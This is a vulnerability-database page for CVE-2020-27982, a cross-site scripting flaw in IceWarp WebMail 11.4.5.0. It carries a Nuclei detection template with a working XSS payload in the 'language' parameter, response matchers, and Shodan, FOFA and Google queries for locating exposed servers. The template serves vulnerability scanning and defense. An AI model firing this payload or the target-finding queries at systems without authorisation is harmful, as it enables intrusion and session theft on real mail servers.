Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-27982
HistoryFeb 14, 2021 - 8:58 p.m.

IceWarp WebMail 11.4.5.0 - Cross-Site Scripting

2021-02-1420:58:07
ProjectDiscovery
github.com
7
cve
cross-site scripting
icewarp
packetstorm

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.011

Percentile

84.6%

IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.

id: CVE-2020-27982

info:
  name: IceWarp WebMail 11.4.5.0 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail.
  reference:
    - https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
    - https://cxsecurity.com/issue/WLB-2020100161
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27982
    - http://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-27982
    cwe-id: CWE-79
    epss-score: 0.00252
    epss-percentile: 0.65095
    cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: icewarp
    product: mail_server
    shodan-query:
      - title:"icewarp"
      - http.title:"icewarp server administration"
      - http.title:"icewarp"
      - cpe:"cpe:2.3:a:icewarp:mail_server"
    fofa-query:
      - title="icewarp server administration"
      - title="icewarp"
    google-query:
      - intitle:"icewarp server administration"
      - intitle:"icewarp"
      - powered by icewarp 10.4.4
  tags: cve,cve2020,xss,icewarp,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=x onerror=alert(1)>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c46540c9957d1011ea21e3effa33c8b04d5392de89222bed44ab49f4c04edd41022100aa540980b37ae1b1b487be1f61abc608e5b9b561f97f4241fb778f4fd3821090:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.011

Percentile

84.6%

Related for NUCLEI:CVE-2020-27982